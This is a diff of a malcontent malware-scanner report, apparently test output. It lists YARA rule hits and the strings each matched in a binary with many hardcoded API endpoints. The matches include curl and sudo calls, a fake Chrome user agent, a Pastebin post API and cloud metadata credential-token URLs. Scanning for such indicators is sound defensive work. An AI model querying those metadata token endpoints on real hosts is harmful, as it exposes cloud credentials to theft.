[funcDownloadHelper](https://github.com/search?q=funcDownloadHelper&type=code)
[sstart downloading](https://github.com/search?q=sstart+downloading&type=code)
[URLDownloadToFile](https://github.com/search?q=URLDownloadToFile&type=code)
[DoneDownloadCond](https://github.com/search?q=DoneDownloadCond&type=code)
[GetDownloadCount](https://github.com/search?q=GetDownloadCount&type=code)
[chunk_downloader](https://github.com/search?q=chunk_downloader&type=code)
[downloadLocation](https://github.com/search?q=downloadLocation&type=code)
[failed_downloads](https://github.com/search?q=failed_downloads&type=code)
[FailedDownloads](https://github.com/search?q=FailedDownloads&type=code)
[GetDownloadsURL](https://github.com/search?q=GetDownloadsURL&type=code)
[GetHasDownloads](https://github.com/search?q=GetHasDownloads&type=code)
[chunkDownloader](https://github.com/search?q=chunkDownloader&type=code)
[downloadPatches](https://github.com/search?q=downloadPatches&type=code)
[DownloadAvatar](https://github.com/search?q=DownloadAvatar&type=code)
[ExportDownload](https://github.com/search?q=ExportDownload&type=code)
[GetDownloadURL](https://github.com/search?q=GetDownloadURL&type=code)
[NextDownloader](https://github.com/search?q=NextDownloader&type=code)
[download_count](https://github.com/search?q=download_count&type=code)
[downloadsrepos](https://github.com/search?q=downloadsrepos&type=code)
[addDownloader](https://github.com/search?q=addDownloader&type=code)
[downloader id](https://github.com/search?q=downloader+id&type=code)
[downloads_url](https://github.com/search?q=downloads_url&type=code)
[has_downloads](https://github.com/search?q=has_downloads&type=code)
[FTPDownload](https://github.com/search?q=FTPDownload&type=code)
[downloadH](https://github.com/search?q=downloadH&type=code) | | MEDIUM | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_value) | Invokes curl | [curl / libcurl / php_curl](https://github.com/search?q=curl+%2F+libcurl+%2F+php_curl&type=code) | -| MEDIUM | [net/http/accept](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept.yara#http_accept_binary) | accepts binary files via HTTP | [Accept](https://github.com/search?q=Accept&type=code)
[application/octet-stream](https://github.com/search?q=application%2Foctet-stream&type=code) | +| MEDIUM | [net/http/accept](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept.yara#http_accept_binary) | accepts binary files via HTTP | [application/octet-stream](https://github.com/search?q=application%2Foctet-stream&type=code)
[Accept](https://github.com/search?q=Accept&type=code) | | MEDIUM | [net/http/content_length](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/content-length.yara#content_length_0) | Sets HTTP content length to zero | [Content-Length: 0](https://github.com/search?q=Content-Length%3A+0&type=code) | | MEDIUM | [net/http/cookies](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/cookies.yara#http_cookie) | [access HTTP resources using cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies) | [Cookie](https://github.com/search?q=Cookie&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code) | | MEDIUM | [net/http/fake_user_agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/fake-user-agent.yara#fake_user_agent_chrome) | pretends to be Chrome | [(KHTML, like Gecko) Chrome](https://github.com/search?q=%28KHTML%2C+like+Gecko%29+Chrome&type=code) | -| MEDIUM | [net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload) | upload content via HTTP form | [POST](https://github.com/search?q=POST&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code)
[post](https://github.com/search?q=post&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits form content to websites | [Content-Type from get jenkins builds request](https://github.com/search?q=Content-Type+from+get+jenkins+builds+request&type=code)
[Content-Type from get jenkins jobs request:](https://github.com/search?q=Content-Type+from+get+jenkins+jobs+request%3A&type=code)
[Content-Type headerstorage: at least one sou](https://github.com/search?q=Content-Type+headerstorage%3A+at+least+one+sou&type=code)
[Content-Type isn](https://github.com/search?q=Content-Type+isn&type=code)
[Content-Type: text/plain](https://github.com/search?q=Content-Type%3A+text%2Fplain&type=code)
[Content-TypePUSH_PROMISECONTINUATIONCookie.V](https://github.com/search?q=Content-TypePUSH_PROMISECONTINUATIONCookie.V&type=code)
[Content-Typeding](https://github.com/search?q=Content-Typeding&type=code)
[Content-Typeinvalid nesting depthcould not p](https://github.com/search?q=Content-Typeinvalid+nesting+depthcould+not+p&type=code)
[Content-Typenet/http: timeout awaiting respo](https://github.com/search?q=Content-Typenet%2Fhttp%3A+timeout+awaiting+respo&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code) | -| MEDIUM | [net/http/webhook](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/webhook.yara#webhook) | supports webhooks | [CustomRegexWebhook](https://github.com/search?q=CustomRegexWebhook&type=code)
[DiscordWebhook](https://github.com/search?q=DiscordWebhook&type=code)
[GetWebhookSecret](https://github.com/search?q=GetWebhookSecret&type=code)
[IncomingWebhook](https://github.com/search?q=IncomingWebhook&type=code)
[KeypipelineWebhooksCategoryread_apiReporterorg](https://github.com/search?q=KeypipelineWebhooksCategoryread_apiReporterorg&type=code)
[MicrosoftTeamsWebhook](https://github.com/search?q=MicrosoftTeamsWebhook&type=code)
[NewWebhookCustomRegex](https://github.com/search?q=NewWebhookCustomRegex&type=code)
[Sessionwebhook](https://github.com/search?q=Sessionwebhook&type=code)
[SlackWebhook](https://github.com/search?q=SlackWebhook&type=code)
[TinesWebhook](https://github.com/search?q=TinesWebhook&type=code)
[Webhook1protobuf](https://github.com/search?q=Webhook1protobuf&type=code)
[WebhookAction](https://github.com/search?q=WebhookAction&type=code)
[WebhookH](https://github.com/search?q=WebhookH&type=code)
[WebhookMultiError](https://github.com/search?q=WebhookMultiError&type=code)
[WebhookResult](https://github.com/search?q=WebhookResult&type=code)
[WebhookSubuser](https://github.com/search?q=WebhookSubuser&type=code)
[WebhookValidationError](https://github.com/search?q=WebhookValidationError&type=code)
[Webhook_Header](https://github.com/search?q=Webhook_Header&type=code)
[Webhook_Vector](https://github.com/search?q=Webhook_Vector&type=code)
[ZapierWebhook](https://github.com/search?q=ZapierWebhook&type=code)
[discordwebhook](https://github.com/search?q=discordwebhook&type=code)
[getWebhooksPermission](https://github.com/search?q=getWebhooksPermission&type=code)
[isWebhook_Credential](https://github.com/search?q=isWebhook_Credential&type=code)
[isWebhook_Data](https://github.com/search?q=isWebhook_Data&type=code)
[microsoftteamswebhook](https://github.com/search?q=microsoftteamswebhook&type=code)
[readwebhooks](https://github.com/search?q=readwebhooks&type=code)
[slackwebhook](https://github.com/search?q=slackwebhook&type=code)
[tineswebhook](https://github.com/search?q=tineswebhook&type=code)
[verifyWebhook](https://github.com/search?q=verifyWebhook&type=code)
[webhook_endpoints](https://github.com/search?q=webhook_endpoints&type=code)
[webhook_read](https://github.com/search?q=webhook_read&type=code)
[webhook_secret](https://github.com/search?q=webhook_secret&type=code)
[webhook_write](https://github.com/search?q=webhook_write&type=code)
[webhookaction](https://github.com/search?q=webhookaction&type=code)
[webhookb2](https://github.com/search?q=webhookb2&type=code)
[writewebhooks](https://github.com/search?q=writewebhooks&type=code) | -| MEDIUM | [net/ip/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#go_scan_tool_val) | Uses struct with JSON representations for host:port | [json:"host"](https://github.com/search?q=json%3A%22host%22&type=code)
[json:"hostname"](https://github.com/search?q=json%3A%22hostname%22&type=code)
[json:"ip"](https://github.com/search?q=json%3A%22ip%22&type=code)
[json:"port"](https://github.com/search?q=json%3A%22port%22&type=code) | +| MEDIUM | [net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload) | upload content via HTTP form | [application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[POST](https://github.com/search?q=POST&type=code)
[post](https://github.com/search?q=post&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits form content to websites | [Content-Type from get jenkins builds request](https://github.com/search?q=Content-Type+from+get+jenkins+builds+request&type=code)
[Content-Type headerstorage: at least one sou](https://github.com/search?q=Content-Type+headerstorage%3A+at+least+one+sou&type=code)
[Content-TypePUSH_PROMISECONTINUATIONCookie.V](https://github.com/search?q=Content-TypePUSH_PROMISECONTINUATIONCookie.V&type=code)
[Content-Typeinvalid nesting depthcould not p](https://github.com/search?q=Content-Typeinvalid+nesting+depthcould+not+p&type=code)
[Content-Typenet/http: timeout awaiting respo](https://github.com/search?q=Content-Typenet%2Fhttp%3A+timeout+awaiting+respo&type=code)
[Content-Type from get jenkins jobs request:](https://github.com/search?q=Content-Type+from+get+jenkins+jobs+request%3A&type=code)
[Content-Type: text/plain](https://github.com/search?q=Content-Type%3A+text%2Fplain&type=code)
[Content-Type isn](https://github.com/search?q=Content-Type+isn&type=code)
[Content-Typeding](https://github.com/search?q=Content-Typeding&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code) | +| MEDIUM | [net/http/webhook](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/webhook.yara#webhook) | supports webhooks | [KeypipelineWebhooksCategoryread_apiReporterorg](https://github.com/search?q=KeypipelineWebhooksCategoryread_apiReporterorg&type=code)
[WebhookValidationError](https://github.com/search?q=WebhookValidationError&type=code)
[MicrosoftTeamsWebhook](https://github.com/search?q=MicrosoftTeamsWebhook&type=code)
[NewWebhookCustomRegex](https://github.com/search?q=NewWebhookCustomRegex&type=code)
[getWebhooksPermission](https://github.com/search?q=getWebhooksPermission&type=code)
[microsoftteamswebhook](https://github.com/search?q=microsoftteamswebhook&type=code)
[isWebhook_Credential](https://github.com/search?q=isWebhook_Credential&type=code)
[CustomRegexWebhook](https://github.com/search?q=CustomRegexWebhook&type=code)
[WebhookMultiError](https://github.com/search?q=WebhookMultiError&type=code)
[webhook_endpoints](https://github.com/search?q=webhook_endpoints&type=code)
[GetWebhookSecret](https://github.com/search?q=GetWebhookSecret&type=code)
[Webhook1protobuf](https://github.com/search?q=Webhook1protobuf&type=code)
[IncomingWebhook](https://github.com/search?q=IncomingWebhook&type=code)
[DiscordWebhook](https://github.com/search?q=DiscordWebhook&type=code)
[Sessionwebhook](https://github.com/search?q=Sessionwebhook&type=code)
[WebhookSubuser](https://github.com/search?q=WebhookSubuser&type=code)
[Webhook_Header](https://github.com/search?q=Webhook_Header&type=code)
[Webhook_Vector](https://github.com/search?q=Webhook_Vector&type=code)
[discordwebhook](https://github.com/search?q=discordwebhook&type=code)
[isWebhook_Data](https://github.com/search?q=isWebhook_Data&type=code)
[webhook_secret](https://github.com/search?q=webhook_secret&type=code)
[WebhookAction](https://github.com/search?q=WebhookAction&type=code)
[WebhookResult](https://github.com/search?q=WebhookResult&type=code)
[ZapierWebhook](https://github.com/search?q=ZapierWebhook&type=code)
[verifyWebhook](https://github.com/search?q=verifyWebhook&type=code)
[webhook_write](https://github.com/search?q=webhook_write&type=code)
[webhookaction](https://github.com/search?q=webhookaction&type=code)
[writewebhooks](https://github.com/search?q=writewebhooks&type=code)
[SlackWebhook](https://github.com/search?q=SlackWebhook&type=code)
[TinesWebhook](https://github.com/search?q=TinesWebhook&type=code)
[readwebhooks](https://github.com/search?q=readwebhooks&type=code)
[slackwebhook](https://github.com/search?q=slackwebhook&type=code)
[tineswebhook](https://github.com/search?q=tineswebhook&type=code)
[webhook_read](https://github.com/search?q=webhook_read&type=code)
[webhookb2](https://github.com/search?q=webhookb2&type=code)
[WebhookH](https://github.com/search?q=WebhookH&type=code) | +| MEDIUM | [net/ip/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#go_scan_tool_val) | Uses struct with JSON representations for host:port | [json:"hostname"](https://github.com/search?q=json%3A%22hostname%22&type=code)
[json:"host"](https://github.com/search?q=json%3A%22host%22&type=code)
[json:"port"](https://github.com/search?q=json%3A%22port%22&type=code)
[json:"ip"](https://github.com/search?q=json%3A%22ip%22&type=code) | | MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping interval to minimum period of](https://github.com/search?q=ping+interval+to+minimum+period+of&type=code)
[ping not acked within timeout](https://github.com/search?q=ping+not+acked+within+timeout&type=code) | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#ip_go) | parses IP address (IPv4 or IPv6) | [IsLinkLocalUnicast](https://github.com/search?q=IsLinkLocalUnicast&type=code)
[IsSingleIP](https://github.com/search?q=IsSingleIP&type=code) | | MEDIUM | [net/proxy/socks5](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/socks5.yara#socks5) | Supports SOCK5 proxies | [SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[socks5](https://github.com/search?q=socks5&type=code) | @@ -83,7 +83,7 @@ | MEDIUM | [net/tcp/connect](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/connect.yara#connect_tcp) | connects to a TCP port | [dialTCP](https://github.com/search?q=dialTCP&type=code) | | MEDIUM | [net/tcp/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/listen.yara#listen_tcp) | listen on a TCP port | [listening on tcp](https://github.com/search?q=listening+on+tcp&type=code) | | MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Uses crypto/ssh to connect to the SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | -| MEDIUM | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url_with_php) | contains hardcoded PHP endpoint | [-//WcardshillsteamsPhototruthclean.php?saintmetallouismeantproofbriefro](https://github.com/search?q=-%2F%2FWcardshillsteamsPhototruthclean.php%3Fsaintmetallouismeantproofbriefro&type=code)
[25https://api.websitepulse.com/textserver.php?method=GetContacts](https://github.com/search?q=25https%3A%2F%2Fapi.websitepulse.com%2Ftextserver.php%3Fmethod%3DGetContacts&type=code)
[bhttps://api.route4me.com/api.v4/address_book.php?api_key=https](https://github.com/search?q=bhttps%3A%2F%2Fapi.route4me.com%2Fapi.v4%2Faddress_book.php%3Fapi_key%3Dhttps&type=code)
[examplepersonallyindex.php?](https://github.com/search?q=examplepersonallyindex.php%3F&type=code)
[https://pastebin.com/api/api_post.php](https://pastebin.com/api/api_post.php)
[https://us1.locationiq.com/v1/reverse.php?key=https](https://us1.locationiq.com/v1/reverse.php?key=https)
[ofpluginspage/index.php?remained](https://github.com/search?q=ofpluginspage%2Findex.php%3Fremained&type=code)
[shttps://api.mesibo.com/api.php?op=useradd](https://github.com/search?q=shttps%3A%2F%2Fapi.mesibo.com%2Fapi.php%3Fop%3Duseradd&type=code) | +| MEDIUM | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url_with_php) | contains hardcoded PHP endpoint | [-//WcardshillsteamsPhototruthclean.php?saintmetallouismeantproofbriefro](https://github.com/search?q=-%2F%2FWcardshillsteamsPhototruthclean.php%3Fsaintmetallouismeantproofbriefro&type=code)
[25https://api.websitepulse.com/textserver.php?method=GetContacts](https://github.com/search?q=25https%3A%2F%2Fapi.websitepulse.com%2Ftextserver.php%3Fmethod%3DGetContacts&type=code)
[bhttps://api.route4me.com/api.v4/address_book.php?api_key=https](https://github.com/search?q=bhttps%3A%2F%2Fapi.route4me.com%2Fapi.v4%2Faddress_book.php%3Fapi_key%3Dhttps&type=code)
[https://us1.locationiq.com/v1/reverse.php?key=https](https://us1.locationiq.com/v1/reverse.php?key=https)
[shttps://api.mesibo.com/api.php?op=useradd](https://github.com/search?q=shttps%3A%2F%2Fapi.mesibo.com%2Fapi.php%3Fop%3Duseradd&type=code)
[https://pastebin.com/api/api_post.php](https://pastebin.com/api/api_post.php)
[ofpluginspage/index.php?remained](https://github.com/search?q=ofpluginspage%2Findex.php%3Fremained&type=code)
[examplepersonallyindex.php?](https://github.com/search?q=examplepersonallyindex.php%3F&type=code) | | MEDIUM | [net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/encode.yara#url_encode) | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) | | MEDIUM | [net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls) | requests resources via URL | [http.request](https://github.com/search?q=http.request&type=code)
[net/url](https://github.com/search?q=net%2Furl&type=code) | | MEDIUM | [persist/kernel_module/unload](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/kernel_module/unload.yara#delete_module) | Unload Linux kernel module | [delete_module](https://github.com/search?q=delete_module&type=code) | @@ -91,26 +91,26 @@ | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo](https://github.com/search?q=sudo&type=code) | | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercepted](https://github.com/search?q=intercepted&type=code)
[interceptor](https://github.com/search?q=interceptor&type=code) | | MEDIUM | [sus/malicious](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/malicious.yara#malicious) | References 'malicious' | [other kinds of malicious content](https://github.com/search?q=other+kinds+of+malicious+content&type=code) | -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://169.254.169.254/latest/api/tokennonce](http://169.254.169.254/latest/api/tokennonce)
[http://169.254.169.254/latest/meta](http://169.254.169.254/latest/meta)
[http://169.254.169.254/latestProcessProviderExecutionErrorfailed](http://169.254.169.254/latestProcessProviderExecutionErrorfailed)
[http://169.254.169.254/metadata/identity/oauth2/token](http://169.254.169.254/metadata/identity/oauth2/token)
[http://169.254.169.254BalancerAttributes](http://169.254.169.254BalancerAttributes)
[http://169.254.170.2/redis](http://169.254.170.2/redis)
[http://169.254.170.2RequestLimitExceededinvalid](http://169.254.170.2RequestLimitExceededinvalid)
[http://Descriptionrelatively](http://Descriptionrelatively)
[http://according](http://according)
[http://addEventListenerresponsible](http://addEventListenerresponsible)
[http://applicationslink](http://applicationslink)
[http://chunkednosniffCreatedIM](http://chunkednosniffCreatedIM)
[http://dictionaryperceptionrevolutionfoundationpx](http://dictionaryperceptionrevolutionfoundationpx)
[http://earth.google.com/kml/2.0](http://earth.google.com/kml/2.0)
[http://earth.google.com/kml/2.1](http://earth.google.com/kml/2.1)
[http://earth.google.com/kml/2.2](http://earth.google.com/kml/2.2)
[http://encoding=](http://encoding=)
[http://familiar](http://familiar)
[http://google.com](http://google.com)
[http://html4/loose.dtd](http://html4/loose.dtd)
[http://imEnglish](http://imEnglish)
[http://interested](http://interested)
[http://interpreted](http://interpreted)
[http://iparticipation](http://iparticipation)
[http://localhost/truncate](http://localhost/truncate)
[http://mathematicsmargin](http://mathematicsmargin)
[http://metadata/computeMetadata/v1/instance/service](http://metadata/computeMetadata/v1/instance/service)
[http://navigation](http://navigation)
[http://ns.adobe.com/xfdf/](http://ns.adobe.com/xfdf/)
[http://ocsp.snowflakecomputing.comFailed](http://ocsp.snowflakecomputing.comFailed)
[http://portal.microsoftazure.de/https](http://portal.microsoftazure.de/https)
[http://s3.amazonaws.com/doc/2006](http://s3.amazonaws.com/doc/2006)
[http://schemas.microsoft.com/3dmanufacturing/core/2015/02](http://schemas.microsoft.com/3dmanufacturing/core/2015/02)
[http://site_name](http://site_name)
[http://staticsuggested](http://staticsuggested)
[http://www./div](http://www./div)
[http://www.C//DTD](http://www.C//DTD)
[http://www.collada.org/2005/11/COLLADASchema](http://www.collada.org/2005/11/COLLADASchema)
[http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2](http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2)
[http://www.hortcut](http://www.hortcut)
[http://www.icon](http://www.icon)
[http://www.interpretation](http://www.interpretation)
[http://www.language=](http://www.language=)
[http://www.opengis.net/gml/3.2](http://www.opengis.net/gml/3.2)
[http://www.opengis.net/gml/3.3/exr](http://www.opengis.net/gml/3.3/exr)
[http://www.opengis.net/kml/2.2](http://www.opengis.net/kml/2.2)
[http://www.style=](http://www.style=)
[http://www.text](http://www.text)
[http://www.topografix.com/GPX/1/1](http://www.topografix.com/GPX/1/1)
[http://www.w3.org/2000/svg](http://www.w3.org/2000/svg)
[http://www.w3.org/2001/XMLSchema](http://www.w3.org/2001/XMLSchema)
[http://www.w3.org/2002/07/owl](http://www.w3.org/2002/07/owl)
[http://www.w3.org/2005/Atom](http://www.w3.org/2005/Atom)
[http://www.w3.org/TR/2001/REC](http://www.w3.org/TR/2001/REC)
[http://www.w3.org/XML/1998/namespacexml](http://www.w3.org/XML/1998/namespacexml)
[http://www.w3.org/shortcut](http://www.w3.org/shortcut)
[http://www.wencodeURIComponent](http://www.wencodeURIComponent)
[http://www.years](http://www.years)
[https://a.klaviyo.com/api/profileshttps](https://a.klaviyo.com/api/profileshttps)
[https://accounts.google.com/o/oauth2/authhttps](https://accounts.google.com/o/oauth2/authhttps)
[https://amplitude.com/api/2/taxonomy/categoryhttps](https://amplitude.com/api/2/taxonomy/categoryhttps)
[https://anypoint.mulesoft.com/apiplatform/repository/v2/organizations/](https://anypoint.mulesoft.com/apiplatform/repository/v2/organizations/)
[https://anypointapi2cartapiflashBasic](https://anypointapi2cartapiflashBasic)
[https://api.abuseipdb.com/api/v2/check](https://api.abuseipdb.com/api/v2/check)
[https://api.abyssale.com/ready](https://api.abyssale.com/ready)
[https://api.adzuna.com](https://api.adzuna.com)
[https://api.aeroworkflow.com/api/unexpected](https://api.aeroworkflow.com/api/unexpected)
[https://api.agora.io/dev/v1/projectshttps](https://api.agora.io/dev/v1/projectshttps)
[https://api.airbrake.io/api/v4/projects/grant_type=client_credentials&client_id=ht](https://api.airbrake.io/api/v4/projects/grant_type=client_credentials&client_id=ht)
[https://api.airtable.com/v0/AWS](https://api.airtable.com/v0/AWS)
[https://api.airvisual.com/v2/countries](https://api.airvisual.com/v2/countries)
[https://api.aiven.io/v1/project](https://api.aiven.io/v1/project)
[https://api.alegra.com/api/v1/users](https://api.alegra.com/api/v1/users)
[https://api.aletheiaapi.com/StockData](https://api.aletheiaapi.com/StockData)
[https://api.ambeedata.com/latest/by](https://api.ambeedata.com/latest/by)
[https://api.anthropic.com/v1/messageshttps](https://api.anthropic.com/v1/messageshttps)
[https://api.api2cart.com/v1.1/account.cart.list.json](https://api.api2cart.com/v1.1/account.cart.list.json)
[https://api.apiflash.com/v1/urltoimage](https://api.apiflash.com/v1/urltoimage)
[https://api.apifonica.com/v2/accounts&my=true&offset=10&limit=99&desc](https://api.apifonica.com/v2/accounts&my=true&offset=10&limit=99&desc)
[https://api.apify.com/v2/acts](https://api.apify.com/v2/acts)
[https://api.apilayer.com/number_verification/countrieshttps](https://api.apilayer.com/number_verification/countrieshttps)
[https://api.apiscience.com/v1/monitorshttps](https://api.apiscience.com/v1/monitorshttps)
[https://api.apitemplate.io/v1/list](https://api.apitemplate.io/v1/list)
[https://api.app.shortcut.com/api/v3/member](https://api.app.shortcut.com/api/v3/member)
[https://api.appcues.com/v2/accounts/](https://api.appcues.com/v2/accounts/)
[https://api.appfollow.io/api/v2/account/usershttps](https://api.appfollow.io/api/v2/account/usershttps)
[https://api.appointedd.com/v1/availability/slots](https://api.appointedd.com/v1/availability/slots)
[https://api.appoptics.com/v1/metricshost](https://api.appoptics.com/v1/metricshost)
[https://api.apptivo.com/app/dao/v6/leads](https://api.apptivo.com/app/dao/v6/leads)
[https://api.artsy.net/api/tokens/xapp_token](https://api.artsy.net/api/tokens/xapp_token)
[https://api.assemblyai.com/v2/transcripthttps](https://api.assemblyai.com/v2/transcripthttps)
[https://api.atlassian.com/admin/v1/orgshttps](https://api.atlassian.com/admin/v1/orgshttps)
[https://api.audd.io/setCallbackUrl/](https://api.audd.io/setCallbackUrl/)
[https://api.autoklose.com/api/campaigns/](https://api.autoklose.com/api/campaigns/)
[https://api.avaza.com/api/Account.blob.core.windows.net/](https://api.avaza.com/api/Account.blob.core.windows.net/)
[https://api.aviationstack.com/v1/flights](https://api.aviationstack.com/v1/flights)
[https://api.aylien.com/news/stories](https://api.aylien.com/news/stories)
[https://api.bannerbear.com/v2/authhttps](https://api.bannerbear.com/v2/authhttps)
[https://api.baremetrics.com/v1/accounthttps](https://api.baremetrics.com/v1/accounthttps)
[https://api.bitbucket.org/2.0/repositoriesMake](https://api.bitbucket.org/2.0/repositoriesMake)
[https://api.blocknative.com/gasprices/blockpriceshttps](https://api.blocknative.com/gasprices/blockpriceshttps)
[https://api.bombbomb.com/v2/lists/https](https://api.bombbomb.com/v2/lists/https)
[https://api.borgbase.com/graphqlhttps](https://api.borgbase.com/graphqlhttps)
[https://api.brandfetch.io/v1/color](https://api.brandfetch.io/v1/color)
[https://api.browshot.com/api/v1/instance/list](https://api.browshot.com/api/v1/instance/list)
[https://api.bscscan.com/api](https://api.bscscan.com/api)
[https://api.bugsnag.com/user/organizations](https://api.bugsnag.com/user/organizations)
[https://api.buildkite.com/v2/access](https://api.buildkite.com/v2/access)
[https://api.bulksms.com/v1/messageshttps](https://api.bulksms.com/v1/messageshttps)
[https://api.buttercms.com/v2/posts/](https://api.buttercms.com/v2/posts/)
[https://api.calendly.com/users/mehttps](https://api.calendly.com/users/mehttps)
[https://api.calorieninjas.com/v1/nutrition](https://api.calorieninjas.com/v1/nutrition)
[https://api.capsulecrm.com/api/v2/usershttps](https://api.capsulecrm.com/api/v2/usershttps)
[https://api.captaindata.co/v2/https](https://api.captaindata.co/v2/https)
[https://api.cashboardapp.com/account.xmlhttps](https://api.cashboardapp.com/account.xmlhttps)
[https://api.centralstationcrm.net/api/users.jsonhttps](https://api.centralstationcrm.net/api/users.jsonhttps)
[https://api.chartmogul.com/v1/pinghttps](https://api.chartmogul.com/v1/pinghttps)
[https://api.chatbot.com/storieshttps](https://api.chatbot.com/storieshttps)
[https://api.chec.io/v1/categorieshttps](https://api.chec.io/v1/categorieshttps)
[https://api.chec.io/v1/products](https://api.chec.io/v1/products)
[https://api.checklyhq.com/v1/checks](https://api.checklyhq.com/v1/checks)
[https://api.clarifai.com/v2/inputshttps](https://api.clarifai.com/v2/inputshttps)
[https://api.clarifai.com/v2/users/mehttps](https://api.clarifai.com/v2/users/mehttps)
[https://api.clickup.com/api/v2/userhttps](https://api.clickup.com/api/v2/userhttps)
[https://api.cliengo.com/1.0/account](https://api.cliengo.com/1.0/account)
[https://api.clockify.me/api/v1/userhttps](https://api.clockify.me/api/v1/userhttps)
[https://api.close.com/api/v1/me/https](https://api.close.com/api/v1/me/https)
[https://api.cloudconvert.com/v2/users/mehttps](https://api.cloudconvert.com/v2/users/mehttps)
[https://api.cloudflare.com/client/v4/certificates](https://api.cloudflare.com/client/v4/certificates)
[https://api.cloudflare.com/client/v4/user/tokens/verify](https://api.cloudflare.com/client/v4/user/tokens/verify)
[https://api.cloudflare.com/client/v4/userhttps](https://api.cloudflare.com/client/v4/userhttps)
[https://api.cloudimage.com/invalidatehttps](https://api.cloudimage.com/invalidatehttps)
[https://api.cloudmersive.com/validate/address/parsehttps](https://api.cloudmersive.com/validate/address/parsehttps)
[https://api.cloudplan.biz/api/user/me](https://api.cloudplan.biz/api/user/me)
[https://api.cloudsmith.io/v1/user/self/https](https://api.cloudsmith.io/v1/user/self/https)
[https://api.cloverly.com/2019](https://api.cloverly.com/2019)
[https://api.cloze.com/v1/profile](https://api.cloze.com/v1/profile)
[https://api.codeclimate.com/v1/userhttps](https://api.codeclimate.com/v1/userhttps)
[https://api.codemagic.io/appsunexpected](https://api.codemagic.io/appsunexpected)
[https://api.coinbase.com/v2/userhttps](https://api.coinbase.com/v2/userhttps)
[https://api.coinlayer.com/api/livelive](https://api.coinlayer.com/api/livelive)
[https://api.column.com/entities](https://api.column.com/entities)
[https://api.companyhub.com/v1/me](https://api.companyhub.com/v1/me)
[https://api.confluent.cloud/iam/v2/api](https://api.confluent.cloud/iam/v2/api)
[https://api.contentful.com/organizationshttps](https://api.contentful.com/organizationshttps)
[https://api.conversiontools.io/v1/taskshttps](https://api.conversiontools.io/v1/taskshttps)
[https://api.convertkit.com/v3/forms](https://api.convertkit.com/v3/forms)
[https://api.copper.com/developer_api/v1/tasks/searchhttps](https://api.copper.com/developer_api/v1/tasks/searchhttps)
[https://api.countrylayer.com/v2/all](https://api.countrylayer.com/v2/all)
[https://api.courier.com/preferences](https://api.courier.com/preferences)
[https://api.craftmypdf.com/v1/get](https://api.craftmypdf.com/v1/get)
[https://api.crowdin.com/api/v2/storageshttps](https://api.crowdin.com/api/v2/storageshttps)
[https://api.currencyfreaks.com/latest](https://api.currencyfreaks.com/latest)
[https://api.currencylayer.com/live](https://api.currencylayer.com/live)
[https://api.currencyscoop.com/v1/latest](https://api.currencyscoop.com/v1/latest)
[https://api.currentsapi.services/v1/latest](https://api.currentsapi.services/v1/latest)
[https://api.dandelion.eu/datatxt/li/v1/](https://api.dandelion.eu/datatxt/li/v1/)
[https://api.dareboost.com/0.8/confighttps](https://api.dareboost.com/0.8/confighttps)
[https://api.datadoghq.comhttps](https://api.datadoghq.comhttps)
[https://api.deepai.org/api/text](https://api.deepai.org/api/text)
[https://api.deepgram.com/v1/projects](https://api.deepgram.com/v1/projects)
